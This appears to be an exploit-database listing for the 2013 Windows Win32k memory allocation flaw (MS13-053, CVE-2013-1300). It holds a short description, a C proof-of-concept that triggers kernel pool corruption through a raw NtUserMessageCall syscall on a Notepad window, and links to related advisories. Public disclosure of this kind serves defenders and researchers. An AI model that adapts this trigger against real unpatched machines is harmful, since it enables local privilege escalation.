Lucene search
0xbigban1337DAY-ID-21226HistorySep 12, 2013 - 12:00 a.m.
MS13-053 Win32k Memory Allocation Vulnerability
2013-09-1200:00:00
0xbigban
0day.today
39
EPSS
0.001
Percentile
40.9%
win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka “Win32k Memory Allocation Vulnerability.”
/*
more detials:
https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up-kernel-exploit/
this poc is written by 0xBigBan
*/
#include <windows.h>
#define __NtUserMessageCall 0x11ea //on win7 sp1 x86
void SystemCall(DWORD ApiNumber, ...) {
__asm{
lea edx, [ebp+0x0c]
mov eax, ApiNumber
int 0x2e
leave
ret
}
}
int main() {
//you should have open a txt file with notepad
HWND handle = FindWindow(NULL,"a.txt - notepad");
void* ptr = malloc(sizeof(int)*2);
SystemCall(__NtUserMessageCall,
handle,
WM_GETTEXT,
0x8, //buffer size
ptr, //user mode buffer
0x0,
0x2b3,
0x2); //ASCII boolean/flag
}
# 0day.today [2018-02-18] #Related
cvelist
cvelist
CVE-2013-1300
2013-07-10 01:00:00
prion
prion
Memory corruption
2013-07-10 03:46:00
zdt
zdt
Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
2014-05-06 00:00:00
symantec
symantec
packetstorm
packetstorm
Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
2014-05-05 00:00:00
metasploit
metasploit
Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
2014-03-12 10:25:52
nvd
nvd
CVE-2013-1300
2013-07-10 03:46:09
cve
cve
CVE-2013-1300
2013-07-10 03:46:09
exploitdb
exploitdb
seebug
seebug
Microsoft Windows Kernel 'Win32k.sys'本地权限提升漏洞(CVE-2013-1300)(MS13-053)
2013-07-10 00:00:00
zdi
zdi
nessus
nessus
openvas
openvas
securityvulns
securityvulns
Microsoft Windows multiple security vulnerabilities
2013-07-29 00:00:00